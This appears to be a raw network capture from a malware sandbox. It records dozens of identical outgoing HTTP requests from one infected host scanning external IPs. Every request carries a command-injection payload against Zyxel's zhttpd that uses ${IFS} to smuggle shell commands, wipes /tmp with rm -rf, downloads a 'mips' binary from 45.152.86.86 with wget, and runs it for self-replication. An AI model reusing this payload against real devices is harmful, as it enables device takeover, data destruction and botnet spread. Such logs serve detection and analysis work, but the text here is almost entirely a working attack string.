                                        Mar 31, 2024 09:22:19.586421967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7622192.168.2.233795290.251.160.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586489916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7623192.168.2.2344166140.16.250.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586543083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7624192.168.2.235126685.28.117.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586606979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7625192.168.2.2336406120.71.224.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586674929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7626192.168.2.2333870175.186.117.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586764097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7627192.168.2.233285024.118.145.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586810112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7628192.168.2.234014678.14.59.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586905003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7629192.168.2.234809490.84.6.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.586946964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7630192.168.2.234792838.11.146.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587006092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7631192.168.2.233675868.57.44.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587091923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7632192.168.2.2344898195.147.7.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587155104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7633192.168.2.2333630201.97.42.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587204933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7634192.168.2.235041684.77.51.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587265015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7635192.168.2.235565445.207.149.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587332010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7636192.168.2.2337904126.98.58.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587388992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7637192.168.2.2348346190.69.199.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587456942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7638192.168.2.234239099.98.194.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587529898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7639192.168.2.2337476219.160.87.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587605953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7640192.168.2.2357704119.91.234.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587655067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7641192.168.2.2336152167.64.148.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587708950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7642192.168.2.2343544106.47.160.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587800980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7643192.168.2.2351806185.2.229.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587857008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7644192.168.2.235138237.74.112.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.587929010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7645192.168.2.2346158189.129.220.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588013887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7646192.168.2.235971040.252.93.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588066101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7647192.168.2.233786285.199.225.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588141918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7648192.168.2.2344798206.13.182.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588211060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7649192.168.2.235140895.251.127.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588265896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7650192.168.2.2349098196.48.79.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588339090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7651192.168.2.2360372167.220.44.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588398933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7652192.168.2.2359376142.20.31.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588494062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7653192.168.2.2341678171.55.14.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588550091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7654192.168.2.2351656171.172.61.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588607073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7655192.168.2.2345348171.74.200.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588671923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7656192.168.2.235181836.207.42.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588742018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7657192.168.2.234933870.87.27.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588819981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7658192.168.2.2355726122.229.82.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588888884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7659192.168.2.2349330106.109.95.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.588926077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7660192.168.2.2333580217.30.20.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589005947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7661192.168.2.2356980165.99.255.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589091063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7662192.168.2.2340844129.81.238.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589137077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7663192.168.2.235269463.216.125.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589194059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7664192.168.2.2343140161.7.11.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589257002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7665192.168.2.2341028113.47.228.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589323997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7666192.168.2.2348690175.205.246.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589392900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7667192.168.2.233360095.248.167.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589454889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7668192.168.2.2342124180.21.112.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589530945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7669192.168.2.2335448220.187.12.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589586973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7670192.168.2.2345820180.172.80.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589684010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7671192.168.2.235422440.196.75.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589737892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7672192.168.2.2340736130.202.107.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589801073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7673192.168.2.2348732185.107.239.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589889050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7674192.168.2.235924296.117.5.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589930058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7675192.168.2.2340188145.110.195.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.589989901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7676192.168.2.2357052163.77.96.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590053082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7677192.168.2.2359806129.45.8.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590130091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7678192.168.2.2353886198.88.134.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590181112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7679192.168.2.2353194218.235.137.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590250969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7680192.168.2.2332798139.33.202.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590306044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7681192.168.2.2345398218.22.91.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590351105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7682192.168.2.235951649.112.46.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590416908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7683192.168.2.2344550133.106.239.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590483904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7684192.168.2.2346148175.84.184.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590567112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7685192.168.2.2354260153.155.90.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590632915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7686192.168.2.2353760110.78.245.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590698004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7687192.168.2.234801475.179.93.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590780973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7688192.168.2.2350634135.222.49.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590847015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7689192.168.2.2356904152.21.165.46443
                                        TimestampBytes transferredDirectionData
